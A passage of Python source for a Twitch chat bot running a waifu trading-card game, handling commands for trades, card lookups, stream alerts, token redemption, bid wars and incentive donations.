if have["rarity"] >= firstSpecialRarity or want["rarity"] >= firstSpecialRarity:
self.message(channel,
"Sorry, irregular rarity cards can only be traded for other irregular rarity cards.",
isWhisper=isWhisper)
return
highercost = int(config["rarity" + str(max(have["rarity"], want["rarity"])) + "Value"])
lowercost = int(config["rarity" + str(min(have["rarity"], want["rarity"])) + "Value"])
points = highercost - lowercost
if want["rarity"] < have["rarity"]:
payup = otherid
# cancel any old trades with this pairing
cur.execute(
"UPDATE trades SET status = 'cancelled', updated = %s WHERE fromid = %s AND toid = %s AND status = 'open'",
[current_milli_time(), ourid, otherid])
# insert new trade
tradeData = [ourid, otherid, want['id'], want['rarity'], have['id'], have['rarity'], points, payup,
current_milli_time(), "$$whisper$$" if isWhisper else channel]
cur.execute(
"INSERT INTO trades (fromid, toid, want, want_rarity, have, have_rarity, points, payup, status, created, originChannel) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, 'open', %s, %s)",
tradeData)
havedata = getWaifuById(have['id'])
wantdata = getWaifuById(want['id'])
haveStr = getWaifuRepresentationString(have['id'], havedata['base_rarity'], have['rarity'],
havedata['name'])
wantStr = getWaifuRepresentationString(want['id'], wantdata['base_rarity'], want['rarity'],
wantdata['name'])
paying = ""
if points > 0:
if payup == ourid:
paying = " with you paying them " + str(points) + " points"
else:
paying = " with them paying you " + str(points) + " points"
self.message(channel,
"Offered {other} to trade your {have} for their {want}{paying}".format(other=other,
have=haveStr,
want=wantStr,
paying=paying),
isWhisper=isWhisper)
return
if command == "lookup":
if len(args) != 1:
self.message(channel, "Usage: !lookup <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerDescriptions = getWaifuOwners(waifu['id'], waifu['base_rarity'])
if len(ownerDescriptions) > 3:
ownerDescriptions = ownerDescriptions[0:2] + ["%d others" % (len(ownerDescriptions) - 2)]
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
# check for packs
with db.cursor() as cur:
cur.execute(
"SELECT users.name FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid = boosters_opened.id JOIN users ON boosters_opened.userid = users.id WHERE boosters_cards.waifuid = %s AND boosters_opened.status = 'open'",
[waifu['id']])
packholders = [row[0] for row in cur.fetchall()]
if len(ownerDescriptions) > 0:
waifu["owned"] = " - owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " - in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " (not currently owned or in a pack)"
else:
waifu["owned"] = " (not dropped yet)"
# bounty info
if waifu["base_rarity"] >= int(config["numNormalRarities"]):
waifu["bountyinfo"] = ""
waifu["lp"] = ""
else:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] > 0:
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
waifu[
"bountyinfo"] = " {count} current bounties, your bid is highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, your bid of {mine} points is lower than the highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, the highest bid is {highest} points.".format(
**minfo)
else:
waifu["bountyinfo"] = "No current bounties on this waifu."
# last pull
if waifu["pulls"] == 0 or waifu["last_pull"] is None:
waifu["lp"] = ""
else:
lpdiff = (current_milli_time() - waifu["last_pull"]) // 86400000
if lpdiff == 0:
waifu["lp"] = " Last pulled less than a day ago."
elif lpdiff == 1:
waifu["lp"] = " Last pulled 1 day ago."
else:
waifu["lp"] = " Last pulled %d days ago." % lpdiff
self.message(channel,
'[{id}][{rarity}] {name} from {series} - {image}{owned}. {bountyinfo}{lp}'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
except Exception as exc:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "owners":
if len(args) != 1:
self.message(channel, "Usage: !owners <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerDescriptions = getWaifuOwners(waifu['id'], waifu['base_rarity'])
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
# check for packs
with db.cursor() as cur:
cur.execute(
"SELECT users.name FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid = boosters_opened.id JOIN users ON boosters_opened.userid = users.id WHERE boosters_cards.waifuid = %s AND boosters_opened.status = 'open'",
[waifu['id']])
packholders = [row[0] for row in cur.fetchall()]
if len(ownerDescriptions) > 0:
waifu["owned"] = " is owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " is in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " is not currently owned or in a pack"
else:
waifu["owned"] = " has not dropped yet"
self.message(channel,
'[{id}][{rarity}] {name} from {series}{owned}.'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "whisper":
if followsme(tags['user-id']):
self.message("#jtv", "/w {user} This is a test whisper.".format(user=sender), isWhisper=False)
self.message(channel, "Attempted to send test whisper.", isWhisper=isWhisper)
else:
self.message(channel, "{user}, you need to be following me so I can send you whispers!".format(
user=str(tags['display-name'])), isWhisper=isWhisper)
return
if command == "help":
self.message(channel, config["siteHost"] + "/help", isWhisper=isWhisper)
if command == "alerts" or command == "alert":
if len(args) < 1:
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity/set> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
sender = sender.lower()
subcmd = str(args[0]).lower()
if subcmd == "setup":
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
if row is None:
self.message(channel,
"The bot is not in your channel, so alerts can't be set up for you. Ask an admin to let it join!",
isWhisper=isWhisper)
return
if row[0] is None:
self.message("#jtv",
"/w {user} Please go to the following link and allow access: {link}{user}".format(
user=sender.strip(), link=str(streamlabsauthurl).strip()), isWhisper=False)
self.message(channel,
"Sent you a whisper with a link to set up alerts. If you didnt receive a whisper, try !whisper",
isWhisper=isWhisper)
else:
self.message(channel,
"Alerts seem to already be set up for your channel! Use !alerts test to test them!",
isWhisper)
cur.close()
return
if subcmd == "test":
isSet = False
if len(args) > 1 and args[1].lower() == "set":
rarity = int(config["numNormalRarities"]) - 1
isSet = True
else:
try:
rarity = parseRarity(args[1])
except Exception:
rarity = int(config["numNormalRarities"]) - 1
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
cur.close()
if row is None or row[0] is None:
self.message(channel,
"Alerts do not seem to be set up for your channel, please set them up using !alerts setup",
isWhisper=isWhisper)
else:
if isSet:
threading.Thread(target=sendSetAlert, args=(
sender, sender, "Test Set", ["Neptune", "Nepgear", "Some other test waifu"], 0,
False)).start()
else:
threading.Thread(target=sendDrawAlert, args=(
sender, {"name": "Test Alert, please ignore", "base_rarity": rarity,
"image": "http://t.fuelr.at/k6g"},
str(tags["display-name"]), False)).start()
self.message(channel, "Test Alert sent.", isWhisper=isWhisper)
return
if subcmd == "config":
try:
configName = args[1]
except Exception:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
if configName == "reset":
cur = db.cursor()
cur.execute("DELETE FROM alertConfig WHERE channelName = %s", [sender])
cur.close()
self.message(channel, "Removed all custom alert config for your channel. #NoireScreamRules",
isWhisper=isWhisper)
return
if configName not in validalertconfigvalues:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
try:
configValue = args[2]
except Exception:
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if len(rows) != 1:
self.message(channel, 'Alert config "' + configName + '" is unset for your channel.',
isWhisper=isWhisper)
else:
configValue = rows[0][0]
self.message(channel,
'Alert config "' + configName + '" is set to "' + configValue + '" for your channel.',
isWhisper=isWhisper)
cur.close()
return
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if configValue == "reset":
cur.execute("DELETE FROM alertConfig WHERE channelName=%s AND config=%s", [sender, configName])
cur.close()
self.message(channel, 'Reset custom alert config "' + configName + '" for your channel.',
isWhisper=isWhisper)
return
if configName == "alertChannel" and configValue not in ["host", "donation", "follow", "reset",
"subscription"]:
self.message(channel,
'Valid options for alertChannel: "host", "donation", "follow", "subscription", "reset"')
cur.close()
return
if len(rows) == 1:
cur.execute("UPDATE alertConfig SET val=%s WHERE channelName=%s AND config = %s",
[configValue, sender, configName])
else:
cur.execute("INSERT INTO alertConfig(val, channelName, config) VALUE (%s, %s, %s)",
[configValue, sender, configName])
cur.close()
self.message(channel, 'Set alert config value "' + configName + '" to "' + configValue + '"',
isWhisper=isWhisper)
return
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
if command == "togglehoraro" and sender in admins and booleanConfig("marathonBotFunctions"):
self.autoupdate = not self.autoupdate
if self.autoupdate:
self.message(channel, "Enabled Horaro Auto-update.", isWhisper=isWhisper)
else:
self.message(channel, "Disabled Horaro Auto-update.", isWhisper=isWhisper)
return
if sender in admins and command in ["status", "title"] and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateTitle(" ".join(args))
self.message(channel, "%s -> Title updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and command == "game" and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateGame(" ".join(args))
self.message(channel, "%s -> Game updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and booleanConfig("marathonBotFunctions") and command == "ffzfollowing":
MarathonBot.instance.updateFollowButtons(args)
self.message(channel, "%s -> Attempted to update follower buttons to %s." % (tags['display-name'], ", ".join(args)))
return
if command == "emotewar":
if int(config["emoteWarStatus"]) == 0:
self.message(channel, "The Emote War is not active right now.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT `name`, `count` FROM emoteWar ORDER BY `count` DESC")
r = cur.fetchall()
msg = "Current War: " if int(config["emoteWarStatus"]) == 1 else "THE WAR HAS BEEN DECIDED: "
for row in r:
msg += str(row[0]) + " " + str(row[1]) + " "
msg += ". Spamming DOES NOT COUNT, spammers will get timed out."
self.message(channel, msg, isWhisper=isWhisper)
return
if command == "nepjoin" and sender.lower() in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !nepjoin <channelname>", isWhisper=isWhisper)
return
chan = str(args[0]).replace("'", "").lower()
if ('#' + chan) in self.mychannels or ('#' + chan) in self.addchannels:
self.message(channel, "Already in that channel!", isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM users WHERE name=%s", [str(chan)])
if (cur.fetchone()[0] or 0) < 1:
self.message(channel,
"That user is not yet in the database! Let them talk in a channel the Bot is in to change that!",
isWhisper=isWhisper)
cur.close()
return
cur.execute("INSERT INTO channels(name) VALUES (%s)", [str(chan)])
self.join("#" + chan)
self.message("#" + chan, "Hi there!", isWhisper=False)
self.addchannels.append('#' + chan)
self.message(channel, "Joined #" + chan, isWhisper=isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Tried joining, failed. Tell Marenthyu the following: " + str(sys.exc_info()),
isWhisper=isWhisper)
logger.error("Error Joining channel %s: %s", chan, str(sys.exc_info()))
return
if command == "nepleave" and (sender in superadmins or ("#" + sender) == str(channel)):
if len(args) > 0:
self.message(channel, "nepleave doesn't take in argument. Type it in the channel to leave.",
isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("DELETE FROM channels WHERE name = %s", [channel[1:]])
self.leavechannels.append(str(channel))
# self.mychannels.remove(str(channel))
self.message(channel, "ByeBye!", isWhisper=False)
self.part(channel)
cur.close()
return
except Exception:
self.message(channel, "Tried to leave but failed D:", isWhisper=isWhisper)
logger.error("Error leaving %s: %s", channel, str(sys.exc_info()))
return
if command == "reload" and sender in superadmins:
# print("in reload command")
loadConfig()
self.message(channel, "Config reloaded.", isWhisper=isWhisper)
return
if command == "redeem":
if len(args) != 1:
self.message(channel, "Usage: !redeem <token>", isWhisper=isWhisper)
return
cur = db.cursor()
# Are they a DeepDigger?
cur.execute(
"SELECT id, points, waifuid, boostername, type, badgeID FROM tokens WHERE token=%s AND claimable=1 AND (only_redeemable_by IS NULL OR only_redeemable_by = %s) AND (not_redeemable_by IS NULL OR not_redeemable_by != %s) LIMIT 1",
[args[0], tags['user-id'], tags['user-id']])
redeemablerows = cur.fetchall()
if len(redeemablerows) == 0:
self.message(channel, "Unknown token.", isWhisper)
cur.close()
return
redeemdata = redeemablerows[0]
# already claimed by this user?
cur.execute("SELECT COUNT(*) FROM tokens_claimed WHERE tokenid = %s AND userid = %s",
[redeemdata[0], tags['user-id']])
claimed = cur.fetchone()[0] or 0
if claimed > 0:
self.message(channel, "%s, you have already claimed this token!" % tags['display-name'], isWhisper)
cur.close()
return
# booster?
packid = None
received = []
if redeemdata[3] is not None:
# check for an open booster in their account
# checked first because it's the only way a redeem can be blocked entirely
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't claim this token while you have an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
cur.close()
return
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, redeemdata[3],
False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
received.append("a free booster: %s/booster?user=%s" % (config["siteHost"], sender))
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % redeemdata[3]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your redeem, please try again later.",
isWhisper)
cur.close()
return
# waifu?
if redeemdata[2] is not None:
waifuinfo = getWaifuById(redeemdata[2])
giveCard(tags['user-id'], waifuinfo['id'], waifuinfo['base_rarity'])
if waifuinfo['base_rarity'] < int(config["numNormalRarities"]) - 1:
attemptPromotions(waifuinfo['id'])
waifuinfo['rarity'] = config["rarity%dName" % waifuinfo['base_rarity']]
received.append("A waifu: [{id}][{rarity}] {name} from {series}".format(**waifuinfo))
# points
if redeemdata[1] != 0:
addPoints(tags['user-id'], redeemdata[1])
received.append("%d points" % redeemdata[1])
# badge?
if redeemdata[5] is not None:
badge = getBadgeByID(redeemdata[5])
success = giveBadge(tags['user-id'], badge["id"])
if success:
received.append("A shiny new Badge: %s" % badge["name"])
else:
received.append("An invalid badge, or a badge you already had: %s" % badge["name"])
cur.execute(
"INSERT INTO tokens_claimed (tokenid, userid, points, waifuid, boostername, boosterid, timestamp, badgeID) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)",
[redeemdata[0], tags['user-id'], redeemdata[1], redeemdata[2], redeemdata[3], packid,
current_milli_time(), redeemdata[5]])
# single use?
if redeemdata[4] == 'single':
cur.execute("UPDATE tokens SET claimable = 0 WHERE id = %s", [redeemdata[0]])
# show results
self.message(channel,
"%s -> Successfully redeemed the token %s, added the following to your account -> %s" % (
tags['display-name'], args[0], " and ".join(received[::-1])), isWhisper)
cur.close()
return
if command == "wars":
with db.cursor() as cur:
cur.execute("SELECT id, title FROM bidWars WHERE status = 'open'")
wars = []
warnum = 0
for war in cur.fetchall():
warnum += 1
wars.append("%s%s (!war %s)" % ("; " if warnum > 1 else "", war[1], war[0]))
if len(wars) == 0:
self.message(channel,
"%s, there are no bidwars currently open right now." % tags['display-name'],
isWhisper)
else:
messages = ["Current Bidwars: "]
for war in wars:
if len(messages[-1]) + len(war) > 400:
messages.append(war)
else:
messages[-1] += war
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "war":
if len(args) != 1:
self.message(channel, "Usage: !war <id>", isWhisper)
return
with db.cursor() as cur:
cur.execute(
"SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s",
[args[0]])
war = cur.fetchone()
if war is None:
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
# get choices
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
# render
if len(choices) == 0:
if openEntry and status == 'open':
self.message(channel,
"The %s bidwar has no choices defined yet! Add your own for %d or more points with !vote %s <choice> <points>" % (
title, openEntryMinimum, warid), isWhisper)
else:
# this bidwar was never setup properly, ignore it exists
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
if status == 'closed':
# does the "first place" actually have any votes?
if choices[0][1] == 0:
# no, so this bid war hasn't started yet, don't let on it exists
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
else:
runnersup = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices[1:])
self.message(channel,
"The %s bidwar is over! The winner was %s with %d points. Runners up: %s" % (
title, choices[0][0], choices[0][1], runnersup), isWhisper)
else:
# open war
choicesStr = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices)
msg = "The %s bidwar is currently open! Current votes: %s. !vote %s <choice> <points> to have your say." % (
title, choicesStr, warid)
if openEntry:
msg += " You can add a new choice by contributing at least %d points (%d characters maximum)." % (
openEntryMinimum, openEntryMaxLength)
self.message(channel, msg, isWhisper)
return
if command in ["vote", "donate"] and isMarathonChannel:
# pudding mode?
puddingMode = False
if len(args) > 0 and args[-1].lower() == "pudding":
puddingMode = True
args = args[:-1]
if len(args) == 1:
# special case: is there only 1 incentive and no bidwars?
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM bidWars WHERE `status` = 'open'")
warCount = cur.fetchone()[0] or 0
cur.execute("SELECT COUNT(*) FROM incentives WHERE `status` = 'open'")
incCount = cur.fetchone()[0] or 0
if warCount == 0 and incCount == 1:
# donate to that incentive
cur.execute("SELECT id FROM incentives WHERE `status` = 'open' LIMIT 1")
args = [cur.fetchone()[0]] + args
if len(args) < 2:
if command == "vote":
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
else:
self.message(channel,
"Usage: !donate <id> <amount> (!incentives to see a list of incentives / IDs)",
isWhisper)
return
with db.cursor() as cur:
# find out if this is a bidwar, an incentive or nothing
cur.execute("SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s", [args[0]])
war = cur.fetchone()
if war is not None:
if len(args) < 3:
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
if status == 'closed':
self.message(channel, "%s -> That bidwar is currently closed." % tags['display-name'])
return
# pudding mode?
exchangeRate = int(config["puddingExchangeRateMarathon"])
currency = 'pudding' if puddingMode else 'points'
# check their points entry
try:
points = int(args[-1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
contribution = points * exchangeRate
contributionStr = "%d pudding (-> %d points)" % (points, contribution)
else:
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
contribution = points
contributionStr = "%d points" % points
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
choiceslookup = [choice[0].lower() for choice in choices]
theirchoice = " ".join(args[1:-1]).strip()
theirchoiceL = theirchoice.lower()
if theirchoiceL not in choiceslookup:
# deal with custom choice entry
if not openEntry:
self.message(channel, "%s -> That isn't a valid choice for the %s bidwar." % (
tags['display-name'], title))
return
for word in bannedWords:
if word in theirchoiceL:
#self.message(channel, ".timeout %s 300" % sender, isWhisper)
self.message(channel,
"%s -> No vulgar choices allowed (warning)" % tags['display-name'])
return
if contribution < openEntryMinimum:
self.message(channel,
"%s -> You must contribute at least %d points or %d pudding to add a new choice to this bidwar!" % (
tags['display-name'], openEntryMinimum, math.ceil(openEntryMinimum / exchangeRate)), isWhisper)
return
if len(theirchoice) > openEntryMaxLength:
self.message(channel,
"%s -> The maximum length of a choice in the %s bidwar is %d characters." % (
tags['display-name'], title, openEntryMaxLength), isWhisper)
return
# all clear, add it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
actionTime = current_milli_time()
qargs = [warid, theirchoice, contribution, actionTime, tags['user-id'], actionTime, tags['user-id']]
cur.execute(
"INSERT INTO bidWarChoices (warID, choice, amount, created, creator, lastVote, lastVoter) VALUES(%s, %s, %s, %s, %s, %s, %s)",
qargs)
logargs = [tags['user-id'], warid, theirchoice, points, contribution, currency, current_milli_time()]
else:
# already existing choice, just vote for it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
qargs = [contribution, current_milli_time(), tags['user-id'], warid, theirchoiceL]
cur.execute(
"UPDATE bidWarChoices SET amount = amount + %s, lastVote = %s, lastVoter = %s WHERE warID = %s AND choice = %s",
qargs)
logargs = [tags['user-id'], warid, theirchoiceL, points, contribution, currency, current_milli_time()]
cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
self.message(channel, "%s -> Successfully added %s to %s in the %s bidwar." % (
tags['display-name'], contributionStr, theirchoice, title))
return
else:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE id = %s", [args[0]])
incentive = cur.fetchone()
if incentive is None:
self.message(channel, "%s -> Invalid incentive/war ID." % tags['display-name'])
return
incid = incentive[0]
title = incentive[1]
currAmount = incentive[2]
required = incentive[3]
if currAmount >= required:
self.message(channel,
"%s -> The %s incentive has already been met!" % (tags['display-name'], title))
return
try:
points = int(args[1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
exchangeRate = int(config["puddingExchangeRateMarathon"])
points = min(points, math.ceil((required - currAmount) / exchangeRate))
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
takePudding(tags['user-id'], points)
contribution = min(points * exchangeRate, required - currAmount)
contributionStr = "%d pudding (-> %d points)" % (points, contribution)
currency = 'pudding'
else:
points = min(points, required - currAmount)
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
addPoints(tags['user-id'], -points)
contribution = points
contributionStr = "%d points" % points
currency = 'points'
cur.execute(
"UPDATE incentives SET amount = amount + %s, lastContribution = %s, lastContributor = %s WHERE id = %s",
[contribution, current_milli_time(), tags['user-id'], incid])
logargs = [tags['user-id'], incid, None, points, contribution, currency, current_milli_time()]
cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
if contribution + currAmount >= required:
self.message(channel, "%s -> You successfully donated %s and met the %s incentive!" % (
tags['display-name'], contributionStr, title), isWhisper)
else:
self.message(channel,
"%s -> You successfully donated %s towards the %s incentive. It needs %d more points to be met." % (
tags['display-name'], contributionStr, title, required - currAmount - contribution),
isWhisper)
return
if command == "incentives" and (isMarathonChannel or isWhisper):
with db.cursor() as cur:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE status = 'open'")
incentives = []
incnum = 0
for ic in cur.fetchall():
incnum += 1
if ic[2] >= ic[3]:
incentives.append("%s%s (%s) - MET!" % ("; " if incnum > 1 else "", ic[1], ic[0]))
else:
incentives.append(
"%s%s (%s) - %d/%d points" % ("; " if incnum > 1 else "", ic[1], ic[0], ic[2], ic[3]))
if len(incentives) == 0:
self.message(channel,
"%s, there are no incentives currently open right now." % tags['display-name'],
isWhisper)
else:
incentives.append(
". !donate <id> <points> to contribute to an incentive (id is the text in brackets)")
messages = ["Current Open Incentives: "]
for inc in incentives:
if len(messages[-1]) + len(inc) > 400:
messages.append(inc)
else:
messages[-1] += inc
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "upgrade":
user = tags['user-id']
if checkHandUpgrade(user):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
return
spendingsToNext = getNextUpgradeSpendings(user) - getSpendings(user)
multiplier = 0.5 # TODO: Make multiplier configurable
directPrice = max(int(spendingsToNext * multiplier), 1)
if len(args) > 0 and args[0] == "buy":
if hasPoints(user, directPrice):
addPoints(user, directPrice * -1)
addSpending(user, spendingsToNext)
upgradeHand(user, gifted=False)
self.message(channel, "Successfully upgraded {user}'s hand for {price} points!".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
else:
self.message(channel,
"{user}, you do not have enough points to upgrade your hand for {price} points.".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
currLimit = handLimit(tags['user-id'])
msgArgs = (tags['display-name'], currLimit, currLimit + 1, spendingsToNext, directPrice)
self.message(channel, ("%s, you currently have %d slots from pack spending. " +
"For space #%d, spend %d more points or use !upgrade buy for %d points.") % msgArgs,
isWhisper)
return
if command == "announce":
if not (sender in superadmins):
self.message(channel, "Admin Only Command.", isWhisper=isWhisper)
return
if len(args) < 1:
self.message(channel, "Usage: !announce <message>", isWhisper=isWhisper)
return
msg = " ".join(args)
for ch in self.mychannels:
self.message(ch, msg, isWhisper=False)
self.message(channel, "Sent Announcement to all channels.", isWhisper=isWhisper)
return
if command == "search":
if len(args) < 1:
self.message(channel, "Usage: !search <name>[ from <series>]", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
from_index = [arg.lower() for arg in args].index("from")
q = " ".join(args[:from_index])
series = " ".join(args[from_index + 1:])
except ValueError:
q = " ".join(args)
series = None
result = search(q, series)
if len(result) == 0:
self.message(channel, "No waifu found with that name.", isWhisper=isWhisper)
return
if len(result) > 8:
self.message(channel, "Too many results! ({amount}) - try a longer search query.".format(
amount=str(len(result))), isWhisper=isWhisper)
return
if len(result) == 1:
self.message(channel,
"Found one waifu: [{w[id]}][{rarity}]{w[name]} from {w[series]} (use !lookup {w[id]} for more info)".format(
w=result[0], rarity=config['rarity' + str(result[0]['base_rarity']) + 'Name']),
isWhisper=isWhisper)
else:
self.message(channel, "Multiple results (Use !lookup for more details): " + ", ".join(
map(lambda waifu: str(waifu['id']), result)), isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
return
if command == "promote":
self.message(channel,
"Promotion is now automatic when you gather enough copies of a waifu at the same rarity in your hand.",
isWhisper)
return
if command == "recheckpromos" and sender in superadmins:
with db.cursor() as cur:
cur.execute("SELECT DISTINCT waifuid FROM has_waifu WHERE amount >= 2")
rows = cur.fetchall()
ids = [row[0] for row in rows]
attemptPromotions(*ids)
self.message(channel, "Rechecked promotions for %d waifus" % len(ids))
return
if command == "changepromos" and sender in superadmins:
# assumes that the new promotion thresholds have already been inserted
if "promoschanged" in config:
self.message(channel, "Already done.")
return
with db.cursor() as cur:
cur.execute(
"SELECT has_waifu.userid, has_waifu.waifuid, has_waifu.rarity, has_waifu.amount, waifus.base_rarity FROM has_waifu JOIN waifus ON has_waifu.waifuid=waifus.id WHERE rarity < 7")
oldhands = cur.fetchall()
cur.execute("DELETE FROM has_waifu WHERE rarity < 7")
# recalculate qty
for oldrow in oldhands:
qty = oldrow[3] * (3 ** (oldrow[2] - oldrow[4]))
giveCard(oldrow[0], oldrow[1], oldrow[4], qty)
# recheck promos
cur.execute("SELECT DISTINCT waifuid FROM has_waifu WHERE amount >= 2")
rows = cur.fetchall()
ids = [row[0] for row in rows]
attemptPromotions(*ids)
# .done
config["promoschanged"] = "yes"
cur.execute("REPLACE INTO config(name, value) VALUES('promoschanged', 'yes')")
return
if command == "freepacks" or command == "freepack" or (command == "bet" and len(args) > 0 and args[0].lower() == "packs"):
if len(args) > 0 and args[0].lower() in ["open", "claim", "redeem"]:
if len(args) < 2:
self.message(channel, "Usage: !freepacks open <booster name>", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT remaining, boostername FROM freepacks WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
result = cur.fetchone()
if result is None or result[0] == 0:
self.message(channel, "You don't have any free packs of that type left to claim!", isWhisper)
